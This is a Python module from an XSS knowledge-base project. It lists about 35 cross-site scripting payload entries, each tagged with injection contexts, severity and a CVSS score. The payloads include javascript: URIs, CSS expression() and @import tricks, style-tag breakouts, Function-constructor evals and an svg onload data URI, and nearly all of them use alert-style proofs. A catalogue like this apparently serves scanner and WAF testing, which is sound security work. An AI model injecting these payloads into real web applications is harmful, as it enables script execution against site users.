#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Context Specific Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


CONTEXT_SPECIFIC_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "context_specific_036": PayloadEntry(
        payload='console.log("XSS")',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_037": PayloadEntry(
        payload="window.alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_038": PayloadEntry(
        payload='document.body.innerHTML="XSS"',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_039": PayloadEntry(
        payload='location.href="javascript:alert(1)"',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_040": PayloadEntry(
        payload='eval("alert(1)")',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_041": PayloadEntry(
        payload='new Function("alert(1)")()',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_042": PayloadEntry(
        payload='Array.constructor.constructor("alert(1)")()',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_043": PayloadEntry(
        payload='Object.constructor.constructor("alert(1)")()',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_044": PayloadEntry(
        payload="alert(1*1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_045": PayloadEntry(
        payload="alert(1+0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_046": PayloadEntry(
        payload="alert(1-0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_047": PayloadEntry(
        payload="alert(1/1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_048": PayloadEntry(
        payload="alert(1%2)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_049": PayloadEntry(
        payload="alert(1&&1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_050": PayloadEntry(
        payload="alert(1||0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_051": PayloadEntry(
        payload="alert(!0)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_052": PayloadEntry(
        payload="alert(!!1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_053": PayloadEntry(
        payload="expression(alert(String.fromCharCode(88,83,83)))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_054": PayloadEntry(
        payload="expression(prompt(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_055": PayloadEntry(
        payload="expression(confirm(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_056": PayloadEntry(
        payload='url("javascript:alert(1)")',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_057": PayloadEntry(
        payload="url(data:text/html,<script>alert(1)</script>)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_058": PayloadEntry(
        payload='@import "javascript:alert(1)"',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_059": PayloadEntry(
        payload="@import url(javascript:alert(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_060": PayloadEntry(
        payload="src:url(javascript:alert(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_061": PayloadEntry(
        payload="}</style><script>alert(1)</script><style>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_062": PayloadEntry(
        payload="/*</style><script>alert(1)</script><style>/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_063": PayloadEntry(
        payload="*/</style><script>alert(1)</script><style>/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_064": PayloadEntry(
        payload="animation:xss 1s;@keyframes xss{from{transform:translateX(expression(alert(1)))}}",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_065": PayloadEntry(
        payload="transition:all 1s expression(alert(1))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_066": PayloadEntry(
        payload="javascript:prompt(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_067": PayloadEntry(
        payload="javascript:confirm(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_068": PayloadEntry(
        payload="livescript:alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_069": PayloadEntry(
        payload="mocha:alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_070": PayloadEntry(
        payload="data:text/html,<svg onload=alert(1)>",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
}
